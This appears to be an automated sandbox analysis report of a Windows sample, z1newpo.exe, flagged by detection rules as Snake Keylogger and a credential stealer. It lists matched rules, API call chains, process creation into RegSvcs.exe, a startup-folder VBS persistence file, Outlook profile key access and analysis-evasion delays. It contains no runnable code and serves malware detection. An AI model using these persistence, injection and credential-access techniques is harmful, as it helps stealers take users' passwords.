                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: name.exe PID: 788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,2_2_00464EAE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,12_2_00464EAE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                    Source: C:\Users\user\Desktop\z1newpo.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\z1newpo.exeFile created: C:\Users\user~1\AppData\Local\Temp\ClintonJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: z1newpo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\z1newpo.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002812000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002822000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002830000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002862000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002892000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000028B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: z1newpo.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\z1newpo.exeFile read: C:\Users\user\Desktop\z1newpo.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\z1newpo.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: C:\Users\user\Desktop\z1newpo.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\z1newpo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: z1newpo.exe | Static file information: File size 1342755 > 1048576
                    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: z1newpo.exe | Static PE information: real checksum: 0xa961f should be: 0x150d2a
                    Source: name.exe.0.dr | Static PE information: real checksum: 0xa961f should be: 0x150d2a
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02459C30 push esp; retf 04AEh 3_2_02459D55
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0245891E pushad ; iretd 3_2_0245891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02458C2F pushfd ; iretd 3_2_02458C30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02458DDF push esp; iretd 3_2_02458DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06032DBF pushfd ; retf 3_2_06032DC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06039241 push es; ret 3_2_06039244
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_00416CB5 push ecx; ret 12_2_00416CC8
                    Source: C:\Users\user\Desktop\z1newpo.exe | File created: C:\Users\user\AppData\Local\directory\name.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\directory\name.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                    Hooking and other Techniques for Hiding and Protection

                    Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (8).png
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_0047A330
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 12_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00434418
                    Source: C:\Users\user\Desktop\z1newpo.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\directory\name.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 411F254
                    Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 41D96AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599433
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598736
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597438
